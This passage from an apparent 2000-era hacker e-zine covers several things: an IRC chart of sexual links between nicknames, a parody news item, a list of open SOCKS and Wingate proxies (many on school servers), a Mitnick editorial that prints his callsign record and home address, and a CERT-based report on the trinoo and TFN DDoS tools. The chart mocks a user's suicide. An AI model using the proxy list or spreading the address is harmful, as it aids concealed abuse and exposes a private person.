fizzgig --|-- rubella | |`----|-------------------------. | | | | | Imperia | deadgirl | | | | | | | | lethar ----------. |.-|--|---|-|---' neologic | Asmodeus | | | | || | | | `---. | | .--' | | | valeriee Mali netik -|-----|-- mayfair | Kalannar | Sinja | | | | | | | | | | | Xaotika StVitus | | | fishie -- Missa | E_D | | | | | | | | | | | outside -- emmie Frobozz | | belial --- Uadjit -- solomon -- Mottyl | | | | | | | | | | |`---. | rebrane | Murmur_gth | | | |.---------|-' Grue --|--|-- moomin13 | | | | | | | ||.--------|-----' | | `--------|------|---------|-- gothbitch! -------|-----------' Fiore --. JelloMold *bifrost* `--. | ||`---------|--------------'| | | `----- aex |`--- pahroza -- anubis MartYr | bile -- turtlgrl --------|----|------' | | | inox Miah secretboy Arkham Stipen - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - hydro311 Starr angieb am0eba -- spyder_bytes thepublic -- rage | | | Chef -- meenk ---- gweeds tigerbeck -- bifrost disorder -- kamira | | | fuz B00bz magpie pinguino -- pill maq -- apok0lyps - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "the big loop" is over 800 people! holy crap! work for the chart. the top rankings: ---------------- #1 winner -- pinguino & gweeds -- 21 links! it's a tie! #2 winner -- meenk -- 19 links! #3 winner -- crank -- 18 links! #4 winner -- xgirl -- 15 links! #5 winner -- n0elle & sQurl -- 13 links! it's a tie! honorable mention: ----------------- 12 links: gothbitch, ophie, GoNINzo, Wayhigh, & phyzzix! 11 links: murmur, evol, lust, Mikey, & fuz! 10 links: pip, & tigerbeck! 9 links: metalchic, Kaleid, hillary, y-windows, fuz, hitchcock, demonika, & l0ra! be a winner *today*! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - unconfirmed links: these are links i've been told more than twice to add, but have then been told by others to remove once they're on the chart. each link stays for six months, & if no one can prove it's valid in that time, it is removed & assumed untrue. if you bore witness to one of these links or know someone who did, mail crank@ice.net with your confession! (no unconfirmed links at this time.) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - notable gross things on the chart: this is a section for easy reference to family members on the chart. the end people are the relation as noted. if you know two people on the big loop are in the same family, mail crank@ice.net & let us rejoice in the incest! tigerbeck -- aries99 1 link: siblings spirit -- hillary -- seth -- candyrain 3 links: siblings pixy -- gweeds -- jess -- andrew -- mswicked 4 links: siblings blueeyes -- 8ball -- crank -- aoxomoxoa -- poppie -- donnie 5 links: siblings art -- seaya -- kaia -- murmur -- sonia -- plexus 5 links: siblings potter -- scat -- bF -- evol -- styx 4 links: cousins christy -- kkrazy -- kinessa -- gweeds -- LCN -- tanadept 5 links: stepsiblings - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #2600: lashtal | empress deadguy | maverick | | | | sin ----- speck -- liquid_motion | | beastly -- c4in d_rebel kspiff -- mimes -- dieznyik -- nelli | borys -- zebby (#bodyart) LdyMuriel Erato flutterbi chexbitz `---. | .---' | Kalika -- IceHeart -------------- virago -- mre || | | | Berdiene --'| | Pyra -- Roamer ewheat | `---------. Serenla --' roach -- satsuki -- spinningmind kitiara -- starlord anarchy -- aphex twin soul seeker -- educated guess tempus thales -- lady in black -- midnight sorrow magnatop -- darice jandor -- alexis ryna illusionx -- thumper javaman -- nrmlgrl - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bodyart [#bodyart/#bodypiercing/#tattoo]: ga[r]y | | xindjoo -- grrtigger -- bone-head | | FreAkBoi -- psychoslut -- timo heidikins -- pasquale grub -- gypsie tabaqui -- catbones -- sprite ministry -- SuperMia -- superdave bert37 -- chiot steppah -- creeper syx66 -- gypsy_whore - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #coders: simon -- wolfie -- raphael (#trax) bolt -- ashli - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #ezines: sirlance -- holly -- hardcore | rattle -- s4ra -- doommaker phairgirl -- M4D_3LF -- amanda -- unrelated -- effy -- BigDaddyBill | | pixieOpower spiff -- tl109 figglemuffinz -- creed ilsundal -- fairy_princess vanir -- darkland snarfblat -- d1d1 dimes -- bexy -- mindcrime tut -- casey pezmonkey -- cptbovine greyhawk -- crazybaby cheesus -- meowkovich catbutt -- pulse ygraine -- drool bigmike -- shana camel -- icee UberFizzGig -- kniht -- wadsworth - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #hack: t0c -- seussy -- o0 | taner glyph -- adnama -- weaselboy -- vein -- montell | | m0rticia shamrock -- jennicide -- efpee -- imposter-dh | bellum radikahl -- jazmine -- gitm t3kg -- elfgard pluvius -- lydia panic -- plant -- erikt sl33p -- molldoll allman -- costales rhost -- sue_white serpent -- no_ana vaxbuster -- tiggie -- redragon ajrez -- luminare -- m0jo - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #mindvox: killarney -- tomwhore -- fairosa -- kids - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - misc: MsLePew -- Beacher sangfroid -- inspektor foo -- leeny HippieEB -- Imaj mskathy -- strahd plutonium -- pixiedust cnelson -- vanessa Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss doogie -- sarahlove kirby-wan -- cybergirl lurid -- deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar jaran -- duke chs -- princess ndex -- illusions - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - music [#punk/#ska/#sxe]: solaris -- kojak -- chelsea -- pieskin -- lady rude | kcskin -- janew | kamaskin -- kimee -- dano joojoo nes | | auralee -- konfuz -- subgurl -- danx -- starla | | kathy21 alee mutata -- skidman shellskin -- amberskin astrophil -- maggiemae skarjerk -- pancreas prick -- taxie -- jubjub - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #seattle: nitefall bgh -- superlime -- Shill -- Lizsac fimble | | | juice -- e1mo -- shane -- aeriona -- Justnsane -- koosh -- tcb clarita -- dataangel wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- carrianne hamilton -- nurit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #skate: kindje -- tigerkat -- huphtur -- superzan | punkgirl -- yakuza -- maryjane | caroline -- rhy cosmo cks lodias `--. | .--' outlander -- spike -- lightborn .--'|||`--. darkelf ||| weevil ||| tenchi --'|`-- h0ly [r] katskate -- earwax vlinder -- miesj superfly -- conchita -- nobaboon -- no_fievel p4nacea -- bakunin herculez -- nicki - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #trax: cardiac sandman -- trissy skie -- necros | | | saxy -- vegas basehead | | | kiwidog fassassin -- discodiva gblues | squeep -- qporucpine -- ami -- dilvish higherbeing -- ms_saigon -- floss | | howler vizz mellow-d -- kisu -- snowman -- trixi | megz lowrider -- lum -- perisoft mickrip -- astrid -- draggy -- leece pandorra -- malakai ozone -- bliss animix -- pixie lummy -- daedalus frostbitten_dream -- pickl'ette -- redial - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #twilight_zone: revneptho dtm Frizz0 Wireless `----.| .---' | h0lydirt --- nina -- zbrightmn -- halah .--'| `---. | dog3 | whistler RockShox | chilly joeN -- daysee -- evil_ed -- linnea | munchie Loverman -- Missi redbird -- reddy - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #unix: in4mer -- devilgrl gerg -- tyger chloe -- cosmos dem -- webb callechan -- rhiannon RealScott -- Ila supertaz -- skye - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - revision history -- last updated 7-28-99 v9.04: added belial, f_fisher, Murmur_gth, bix, DJTrax, kamira, Heather, phen, montel, monachus, Schquimpy, Nex, phreaky, Sylvie, Katia, banshee, PointBlank, & RaggedyAnne. added magpie, hydro311, kamira, disorder, apok0lyps, maq, rage, & thepublic to the secondary chart. (if anyone has an alternate nick for the #gothic Murmur, please mail me. i used the nick Murmur_gth for now.) added misc gh0st group to the big loop. gweeds moves up to winner 1. meenk moves up to winner 2. gothbitch moves up to honorable mention 12. renamed Listener to alecks. renamed illuminaeti to luminare. renamed zines category to #ezines. added phairgirl -- pixieOpower -- M4D_3LF -- amanda to #ezines. added amanda -- unrelated -- effy -- BigDaddyBill to #ezines. added jennicide -- bellum to #hack. added luminare -- ajrez to #hack. added to misc: deb -- bmbr j-dog -- a_kitten Fenchurch -- Becca captain_zap -- ms_infowar deb -- lurid jaran -- duke chs -- princess ndex -- illusions removed one outdated "unconfirmed link". removed miasma -- six from unconfirmed. oops. removed bogus links: t -- gf -- lilfeet Quarex -- keroppi new links: fizzgig -- (solomon, Asmodeus, fishie, belial) Grue -- gothbitch -- Asmodeus gothbitch -- belial -- Uadjit METchiCK -- (f_fisher, grimmy, deadapril, supervixn) kel -- (disorder, lizzie, gh0st) corp -- gweeds -- magpie aex -- Murmur_gth eppie -- bix styx -- DJTrax meenk -- hydro311 halfman -- sumogirl disorder -- kamira -- apok0lyps -- maq -- Heather -- montel el_jefe -- (Mika, phen, Heather) daud -- monachus amos -- velcro Schquimpy -- (trilobyte, EddieV, Nex) splat -- phreaky Sylvie -- neko -- Katia shipley -- banshee thepublic -- rage hylonome -- PointBlank -- RaggedyAnne hylonome -- RaggedyAnne -- Quarex v9.03: added deadgirl, Gemni, DrMonk, AK47, monkeygrl, Miah, grlfrmars, wildcard, spectacle, kev-man, bile, chinagirl, rubella, Arkham, Uadjit, fishie, solomon, moomin13, Grue, Missa, Mottyl, Kalannar, E_D, Fiore, MartYr, & Stipen. added angieb to the secondary chart. updated number of people in the big loop. gweeds moves up to winner 2. meenk moves up to winner 3. gothbitch moves up to honorable mention 9. added miasma -- six to unconfirmed. added zines The_Sock group to the big loop. added zines AnonGirl group to the big loop. added javaman -- nrmlgrl to #2600. added satsuki -- (IceHeart, roach, spinningmind) to #2600. added doogie -- sarahlove to misc. added kirby-wan -- cybergirl to misc. added shane -- aeriona to #seattle. added to #trax: skie -- necros astrid -- draggy ms_saigon -- vizz snowman -- megz removed bogus links: mailart -- konfuz (mailart = nes) new links: DH -- Gemni -- DrMonk meenk -- AK47 gweeds -- angieb AIDS -- caitlin deadgirl -- Mali -- maq logicbox -- monkeygrl Fiore -- gothbitch -- Miah grlfrmars -- (mogel, wildcard, spectacle, kev-man) turtlegrl -- bile trilobyte -- chinagirl fizzgig -- rubella anubis -- Arkham swisspope -- AnonGirl pahroza -- Uadjit -- solomon -- moomin13 -- Grue Fiore -- solomon -- gothbitch -- Uadjit -- fishie -- Missa Mottyl -- (solomon, Kalannar, E_D) MartYr -- Fiore -- Stipen v9.02: added rebrane, Xaotika, valeriee, JelloMold, neologic, amos, EddieV, Roadruner, TAYL0R HAWKINS, MINNIE DRIVER, secretboy, kel, nevre, freqout, krnl, skatin, Sinja, Frobozz, & hawk. gweeds moves up to winner 2. meenk moves up to winner 3. sQurl moves up to winner 6. metalchic moves up to honorable mention 9. renamed cannianne to carrianne. added to misc: Hawkerly --- MeaNKaT --- Morpheus Vega1 -- Serena DIPTY_DO -- Trish_ -- hellsnake Grace^ -- Gusto -- puckie notyou -- jennyh Skada -- icee_bin -- eriss (special note: eriss was dumped for Skada & subsequently leapt to her death from a nineteeth story window. neat!) added to #zines: nico -- anjee -- meethos -- METchiCK -- The_Sock -- ^mindy^ meethos -- Alucard -- The_Sock -- kitn -- ILUVJeNNA MrJuGGaLo -- METchiCK -- facedown caitlin --- wmmr --- coffeegrl AnonGirl -- Medusa -- PrimeX -- Juliette removed bogus links: emmie -- (netik, msk, Herodotus) billn -- Tay -- retrospek mayfair -- outside Mali -- (Asmodeus, pahroza, Uhlume, Imperia) new links: emmie -- rebrane -- JelloMold Xaotika -- lethar -- valeriee mayfair -- neologic trilobyte -- amos -- EddieV -- sonia sQurl -- Roadruner Tay -- TAYL0R HAWKINS -- MINNIE DRIVER anubis -- secretboy netmask -- kel meenk -- nevre gweeds -- freqout missx -- krnl metalchic -- skatin Imperia -- Asmodeus -- Sinja turtlgrl -- pahroza -- gothbitch -- Mali -- lethar fizzgig -- msk gothbitch -- Frobozz darwin -- hawk v9.01: added tamago, atticus, lilindian, martyn, aries99, ryshask, timmerca, twichykat, soulvamp, mysl, fizzgig, lethar, anubis, & inox. added tigerbeck & bifrost to the secondary chart. updated number of people in the big loop. new "gross link": tigerbeck -- aries99 (1: siblings) gweeds moves up to winner 3. tigerbeck moves up to honorable mention 10. added FreAkBoi -- psychoslut -- timo to #bodyart. added supertaz -- skye to #unix. removed one outdated "unconfirmed link". removed bogus links: juliet -- readwerd FreAkBoi -- ga[r]y (#bodyart) Briana -- homeysan new links: seaya -- tamago _Melody_ -- atticus DrkSphere -- lilindian tigerbeck -- (aries99, martyn, ryshask, timmerca, soulvamp) tigerbeck -- (allira, twichykat, spacegirl, bifrost) gweeds -- mysl msk -- DangerJen -- Astaroth outside -- mayfair netik -- fizzgig emmie -- lethar pahroza -- anubis aex -- inox v9.00: i was going to do something special for 9.00, but there just isn't anything to do. would you people be interested in sexchart tshirts? mail crank@ice.net. note to webmasters - it's not sexchart.8 anymore - sexchart.txt. be sure to update your links. added NeuralizR, vlaad, pahroza, Imperia, Mali, Uhlume, StVitus, Herodotus, & Asmodeus. added am0eba, & spyder_bytes to the secondary chart. added netik & Mali sections to the big loop. added new section: #seattle. moved e1mo links to #seattle. moved koosh -- tcb to #seattle. moved clarita -- dataangel to #seattle. added chexbitz -- virago -- ewheat to #2600. added Astaroth -- DangerJen to #gothic. added plutonium -- pixiedust to misc. added cnelson -- vanessa to misc. added to #seattle: wyclef -- NessaLee Drmc -- Jill- SisSoul -- Matt Dawgie -- Jenay jsk -- ames Liz -- jkowall bgh -- superlime -- Shill -- Lizsac fimble -- koosh -- Justnsane -- aeriona -- superlime kurgan -- babygrrl Mcbeth -- BeccaBoo djinn -- ruthe wankle -- cannianne hamilton -- nurit added halah -- Wireless to #twilight_zone. removed one outdated "unconfirmed link". removed bogus links: e1mo -- chris22 (#seattle) loki -- am0eba -- sledge missx -- (sledge, erikb, ice9) Briana -- nebulizr logicbox -- skully murcurochrome -- jazmine -- deadkat (#hack) new links: am0eba -- spyder_bytes Briana -- (NeuralizR, bumble, nettwerk, homeysan, tsal) teletype -- vlaad netik -- msk -- emmie -- outside aex -- bifrost -- emmie -- netik emmie -- Herodotus bifrost -- turtlgrl Imperia -- msk Mali -- (Uhlume, Imperia, Asmodeus, StVitus, pahroza) @HWA 05.0 Peer finally arrested after over a decade of connection resetting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.ircnews.com/ (Humour, in case you didn't know a common connection error is "connection reset by peer" caused by errors in the network and on occasion a DoS attack on your IRC connection... ;) - Ed) Peer Arrested, Charged With Resetting Connections SEATTLE, WA - An exhaustive eight month cyberhunt ended shortly before dawn on January 14th, 2000, as FBI agents and Washington State Troopers apprehended the elusive chatroom terrorist known only as Peer. The IRC menace was brought to justice after a decade-long connection resetting spree that plagued chatters around the globe. FBI officials said the number of reset connections numbered in the "millions". Connections being reset by peer were the number one cause of interupted chat sessions on all major IRC networks in 1999. Undernet ChanServ Committee member Morrissey told IRCNews.com, "What set peer apart was the element of suprise. With ping, you kinda knew you were gonna time out. You could tell. Peer totally got you out of nowhere." Leland, another bigshot on the Undernet IRC network, praised the FBI for their work, "How many idle times must be ruined? How many cybersex sessions must be cut short before we put an end to Peer and his shinanigans?" Peer's lawyers criticized Leland's use of the word "shinanigans". Peer's lead defence attorney responded, "Really, I think we can come up with a better term than that. We're all adults here. Besides, it's 'alleged' shinanigans." Federal Prosecutor Sarah Evans told IRCNews.com she intends to "throw the book" at Peer. If convicted on all counts, Peer could spend up to the next three years on probation. "His ass is mine.", claimed a motivated Evans. "With any luck, we'll get that judge who handled the Mitnick case." @HWA 06.0 Updated proxies list from IRC4all ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.lightspeed.de/irc4all/ Socks 4 proxies: ~~~~~~~~~~~~~~~~ NotFound 200.248.68.129 NotFound 200.36.19.225 NotFound 195.5.52.154 ch-angrignon.qc.ca 207.236.200.66 m105.clic-in.com.br 200.231.28.15 NotFound 195.42.150.129 www.quicktest.com 12.8.210.132 internet-server.ebf.com.br 200.231.27.1 wk135.dnr-inc.com 216.62.50.135 122-94.w3.com.uy 207.3.122.94 mail.theova.com 195.14.148.65 mercury.knowlbo.co.jp 210.160.144.146 igic.bas-net.by 194.85.255.49 cr216724724.cable.net.co 216.72.47.24 zakproxy.alexcomm.net 163.121.219.62 proxy.quicktest.com 12.8.210.130 NotFound 195.14.148.101 NotFound 210.237.181.226 zskom.vol.cz 212.27.207.7 tsp-proxy.tsss.com 12.2.81.50 proxy.utvlive.com 194.46.2.34 news.ukrnafta.ukrtel.net 195.5.22.196 pcse.essalud.sld.pe 200.37.132.130 dns-server1.tj.pa.gov.br 200.242.244.1 cr216724718.cable.net.co 216.72.47.18 NotFound 194.85.255.117 NotFound 195.42.150.132 NotFound 212.22.69.35 patter.lnk.telstra.net 139.130.81.160 nic-c49-067.mw.mediaone.net 24.131.49.67 NotFound 206.112.35.146 ts18.svamberk.cz 212.47.11.231 NotFound 212.68.162.183 NotFound 194.204.206.139 mars.sos.com.pl 195.117.212.4 mail.ermanco.com 12.2.82.130 www.ukrnafta.ukrtel.net 195.5.22.195 39.volgaex.ru 194.84.127.39 NotFound 194.243.99.199 www.cassvillesd.k12.wi.us 216.56.42.3 34.volgaex.ru 194.84.127.34 pc-gusev3.ccas.ru 193.232.81.47 xl2.cscd.lviv.ua 195.5.56.1 modemcable161.21-200-24.timi.mc.videotron.net 24.200.21.161 tconl9076.tconl.com 204.26.90.76 jm1.joroistenmetalli.fi 194.137.219.130 jovellanos.com 194.224.183.221 ns.ticketport.co.jp 210.160.142.82 plebiscito.synapsis.it 195.31.227.14 NotFound 194.243.99.162 NotFound 194.204.205.93 NotFound 212.205.26.80 NotFound 210.56.18.228 h0000e894998c.ne.mediaone.net 24.128.161.28 NotFound 198.162.23.185 www.sos.iqnet.cz 212.71.157.102 ns.terna.ru 212.188.26.67 NotFound 206.103.12.131 NotFound 203.116.5.58 207-246-74-54.xdsl.qx.net 207.246.74.54 adsl-63-196-81-8.dsl.sndg02.pacbell.net 63.196.81.8 glennsil.ne.mediaone.net 24.128.160.74 dns.hokuto.ed.jp 210.233.0.34 210-55-191-126.ipnets.xtra.co.nz 210.55.191.126 relectronic.ozemail.com.au 203.108.38.61 sai0103.erols.com 207.96.118.243 frontier.netline.net.au 203.28.52.160 210-55-191-125.ipnets.xtra.co.nz 210.55.191.125 NotFound 212.68.162.177 216-59-41-69.usa.flashcom.net 216.59.41.69 mail.medikona.lt 195.14.162.220 NotFound 195.14.148.99 proxy1.israeloff.com 206.112.35.156 NotFound 195.14.148.98 NotFound 195.14.148.97 mail.trutnov.cz 212.27.207.8 sripenanti01-kmr.tm.net.my 202.188.62.6 c111.h202052116.is.net.tw 202.52.116.111 NotFound 195.14.148.100 nevisco.city.tvnet.hu 195.38.100.242 ipshome-gw.iwahashi.co.jp 210.164.242.146 216-59-40-227.usa.flashcom.net 216.59.40.227 NotFound 212.47.11.130 216-59-40-72.usa.flashcom.net 216.59.40.72 altona.lnk.telstra.net 139.130.80.123 burnem.lnk.telstra.net 139.130.54.178 edtn004203.hs.telusplanet.net 161.184.152.139 ns.ukrnafta.ukrtel.net 195.5.22.193 edtn002050.hs.telusplanet.net 161.184.144.18 nic-c40-143.mw.mediaone.net 24.131.40.143 gk8-206.47.23.149.kingston.net 206.47.23.149 dns.rikcad.co.jp 210.170.89.210 dsl-148-146.tstonramp.com 206.55.148.146 52-012.al.cgocable.ca 205.237.52.12 216-59-38-142.usa.flashcom.net 216.59.38.142 dns1.ctsjp.co.jp 210.172.87.146 52-061.al.cgocable.ca 205.237.52.61 edtn003590.hs.telusplanet.net 161.184.150.34 modemcable215.2-200-24.hull.mc.videotron.net 24.200.2.215 Socks 5 proxies ~~~~~~~~~~~~~~~ NotFound 195.5.52.154 NotFound 168.187.78.34 NotFound 210.56.18.228 NotFound 200.241.64.130 NotFound 206.112.35.146 NotFound 194.243.99.162 NotFound 194.243.99.199 garrison-grafixx.com 216.36.30.76 internet-server.ebf.com.br 200.231.27.1 pc-gusev3.ccas.ru 193.232.81.47 mail.clintrak.com 206.112.35.178 NotFound 195.146.97.178 ns.wings.co.jp 210.168.241.106 wk135.dnr-inc.com 216.62.50.135 ts18.svamberk.cz 212.47.11.231 jm1.joroistenmetalli.fi 194.137.219.130 morris.ocs.k12.al.us 216.77.56.74 c111.h202052116.is.net.tw 202.52.116.111 relectronic.ozemail.com.au 203.108.38.61 jovellanos.com 194.224.183.221 oms.ocs.k12.al.us 216.77.56.106 ntserver01.thomastonschools.org 209.150.52.114 port58151.btl.net 206.153.58.151 mail.medikona.lt 195.14.162.220 chester.chesterschooldistrict.com 12.6.236.250 NotFound 206.103.12.131 p5.itb.it 194.243.165.21 NotFound 194.226.183.34 nic-c49-067.mw.mediaone.net 24.131.49.67 south.ocs.k12.al.us 216.77.56.90 NotFound 195.146.98.226 cr216724718.cable.net.co 216.72.47.18 north.ocs.k12.al.us 216.77.56.66 dns.hokuto.ed.jp 210.233.0.34 linux.edu.vologda.ru 194.84.125.217 proxy.utvlive.com 194.46.2.34 ibp.santa.krs.ru 195.161.57.133 dns.rikcad.co.jp 210.170.89.210 207-246-74-54.xdsl.qx.net 207.246.74.54 jeter.ocs.k12.al.us 216.77.56.98 carver.ocs.k12.al.us 216.77.56.114 ohs.ocs.k12.al.us 216.77.56.122 wforest.ocs.k12.al.us 216.77.56.82 dns1.ctsjp.co.jp 210.172.87.146 edtn003590.hs.telusplanet.net 161.184.150.34 edtn004203.hs.telusplanet.net 161.184.152.139 165-246.tr.cgocable.ca 24.226.165.246 216-59-41-69.usa.flashcom.net 216.59.41.69 Wingates ~~~~~~~~ NotFound 210.56.18.228 NotFound 206.103.12.131 port58151.btl.net 206.153.58.151 NotFound 200.241.64.130 wk135.dnr-inc.com 216.62.50.135 cr216724718.cable.net.co 216.72.47.18 dns.hokuto.ed.jp 210.233.0.34 dns.rikcad.co.jp 210.170.89.210 altona.lnk.telstra.net 139.130.80.123 burnem.lnk.telstra.net 139.130.54.178 52-061.al.cgocable.ca 205.237.52.61 proxy.utvlive.com 194.46.2.34 207-246-74-54.xdsl.qx.net 207.246.74.54 edtn002050.hs.telusplanet.net 161.184.144.18 dns1.ctsjp.co.jp 210.172.87.146 edtn004203.hs.telusplanet.net 161.184.152.139 mars.sos.com.pl 195.117.212.4 165-246.tr.cgocable.ca 24.226.165.246 Other proxies available, check the site for more/updated lists. @HWA 07.0 Rant: Mitnick to go wireless? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Editorial, by Cruciphux Jan 23rd 2000 Finally the long awaited release of ueber hacker Kevin Mitnick has arrived, he was released Friday Jan. 21st in the morning and is not allowed to touch computers or cellular phones for a period of three years without express permission of his probation officer. Kevin holds out one hope though, earlier in his 'carreer' Kevin was an avid amateur radio operator and his license recently expired, he is reportedly scrambling to obtain a new one. This poses some very interesting questions, will he be allowed to operate his HAM equipment? Packet Radio For those not in the know myself and several HWA members are also HAM operators, most of us got hooked by the prospect of a technology called "packet radio". The internet runs on a protocol known as X.25 packet radio uses a similar methodology known as AX.25, the "A" denotes "A"mateur. We're some of the few people that have actually IRC'ed using a packet radio link to a unix server over the 2m band, but of course this requires a computer and additional computer equipment hooked to the radio gear necessary to run packet, what if we forget all that since it is out of Kevin's reach to own a computer at this time and look at what other 'trouble' he can get into. Repeater Nets and the Autopatch The radios of choice these days among young hams are dual band HT's (short for handy-talky or 'walky-talkie') these will usually cover the 2m band and the 440 cm bands, the 2m band by itself is the most common band in use and operates a great deal using repeaters. A repeater can be compared to a cell site insomuch as it takes a weak signal (the HT, generally 100mw to 4 watts in power, much like small cell phones) and REPEATS or re-broadcasts on another (close) frequency a stronger signal, thus reaching greater range. With special DTMF codes it is possible to LINK repeaters and talk across the country using repeater nets. Whats so great about this?, apart from the obvious ability to talk to people long distances for little to no cost, many repeaters have the magic box known as an AUTOPATCH. The autopatch is a computer interface at the repeater site that interfaces your radio signals with a TELCO line. (aha!). Yes many hams enjoy the priviledges (minus obvious privacy and anonymity) of 'cellular' or 'radio phone' useage for minimal cost. For a GOOD radio you are looking at an investment around $500 and for a HAM club membership (to get all the repeater and autopatch codes etc) you're looking at around $15/year or you can find the codes posted in many places on the web. Caveats / privacy The airwaves are 'public property' and as such are regulated (for our own good of course) by big brother, that being the FCC in the U.S.A or DOC in Canada. When you pass your licensing test (minimal proficiency in electronics and general radio theory must be demonstrated via written test) you will be assigned a unique CALL SIGN (in some places you can request a custom/vanity sequence but will be allocated a random unused call if your request is being used). Since the airwaves are public property, so are the records of those users that are licensed to broadcast on them. Several online databases exist or can be purchased cheaply on CDROM with many search features like search by name, call address, partials etc... in this case a simple search on the QRZ website (http://www.qrz.com/) in the OLD database for "Kevin Mitnick" returns several possible matches, among them the correct one which is listed below. -------------------------------------------------------------------------- Callbook Data for N6NHG The following information is taken from the March 1993 QRZ Ham Radio Callsign Database. This is not the current information for this callsign. Click on the underlined callsign to see the latest information for this record. Callsign: N6NHG Class: General Name: KEVIN D MITNICK Effective: 12 Dec 1989 Expires: 12 Dec 1999 Address: 14744 LEADWELL ST City/State: VAN NUYS CA 91405 -------------------------------------------------------------------------- We can safely assume this is correct since the initials (KDM) are right and the location matches up along with the license renewal date of 12/12/99. Shennanigans How does Kevin fit into all this? well as you can see, it is possible to interface the radio with computer equipment and also manipulate outside phone lines using ham radios, a recurring problem in these parts were pirate operators making bogus 911 calls using the local CN-Tower's (then public or 'open' autopatch - it now requires a code and subaudible PL tone) actually closed down the repeater site for some time and caused unknown harassing traffic to the 911 operators fielding the bogus calls. The pirate is not totally safe however. much like Kevin was apprehended by Tsutomu thru lax use of his cellphone and some radio direction finding gear (RDF) so can the 2m pirate be tracked through RDF triangulation, several grass roots groups do nothing but track down pirate signals or sometimes for competition, random placed signals, in what is known as the 'Fox Hunt'. But this requires lots of manpower and the willingness to get out there and help do some tracking. Epilogue I truly hope Kevin is allowed to get back into one of his lifetime loves but he may find that there are too many caveats with new features and computer integration into the repeater systems, mailboxes and the like are common place on repeaters, and so are email gateways, so it is conceivable that one could inadvertantly get into trouble through the grey lines of technology.... Meanwhile, all the best to Kevin and his family, and hopefully you learned a little bit about amateur radio's offerings along the way, peace out. Cruciphux cruciphux@dok.org Editor HWA.hax0r.news newsletter. http://welcome.to/HWA.hax0r.news/ Further reading: http://www.arrl.org - The main site of the American Radio Relay League http://www.qrz.com/ - If you know the callsign of the operator his docs are published publically in a database which can be searched online here. Also contains other info and links. http://www.freekevin.com/ - You know, like more info than you need on KDM. @HWA 08.0 Distrubuted Attacks on the rise. TFN and Trinoo. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CMP Techweb : http://www.techweb.com/wire/story/TWB19991130S0010 Intruders Get Under A Network's Skin (11/30/99, 5:40 p.m. ET) By Rutrell Yasin, InternetWeek A rise in rogue distributed denial of service tools being installed on networks by intruders has prompted the Computer Emergency Response Team (CERT) Coordination Center to help companies thwart the large coordinated packet flooding attacks. CERT, a watchguard organization, has issued an advisory on two tools--trinoo and Tribe Flood Network (TFN)--after receiving reports from organizations affected by the tools. The tools "appear to be undergoing active development, testing, and deployment on the Internet," according to a CERT incident note. So far, the tools have been installed on thousands of servers or workstations in about 100 enterprise sites, said Kevin Houle, CERT's incident response team leader. While the type of packet flooding attacks the tools generate are not new, the scope of the attacks can have a devastating impact on an enterprise network, industry experts and IT managers agreed. Both trinoo and TFN enable an intruder to launch coordinated attacks from many sources against one or more targets. In essence, the tools use bandwidth from multiple systems on diverse networks to generate potent attacks. The tools "can generate very large denial of service attacks that consume as much as one gigabyte of data per second," said Houle. To put that in perspective: Rather than using one BB gun to hit a target, a hacker now has the equivalent of 1,000 BB guns, Houle said. Or the effects can be more like a shotgun, said Mike Hagger, vice president of security at Oppenheimer Funds. These tools can "be deadly and can bring a company to its knees in a matter of seconds," Hagger said. These rogue distributed tools are usually installed on host servers that have been compromised by exploiting known security holes, such as various Remote Procedural Call vulnerabilities, according to CERT. Trinoo is used to launch coordinated UDP flood attacks from many sources. A trinoo network consists of a small number of servers and a large number of clients. To initiate an attack, an intruder connects to a trinoo server and instructs it to launch an attack against one or more IP addresses. The trinoo server then communicates with the clients, giving them instructions to attack one or more IP addresses for a specified period of time, CERT said. In addition to UDP flood attacks, TFN can generate TCP SYN flood, ICMPecho request flood, and ICMP directed broadcasts or smurf attacks. The tool can generate packets with spoofed source IP addresses. To launch an attack with TFN, an intruder instructs a client or server program to send attack instructions to a list of TFN servers or clients. In its alert, CERT has issued a number of steps IT managers can take to thwart distributed denial of service attacks. To prevent installation of distributed attack tools on networked systems, users should stay up to date with security patches to operating systems and applications software. IT managers should also continuously monitor their networks for signature of distributed attack tools. For example, if a company uses intrusion detection systems, IT should tune it to recognize signs of trinoo or TFN activity. Since a site under attack may be unable to communicate via the Internet during an attack, security policies should include "out of the band communications with upstream network operators or emergency response teams," CERT advised. @HWA CERT Advisory: http://www.cert.org/incident_notes/IN-99-07.html CERT® Incident Note IN-99-07 The CERT Coordination Center publishes incident notes to provide information about incidents to the Internet community. Distributed Denial of Service Tools Updated: December 8, 1999 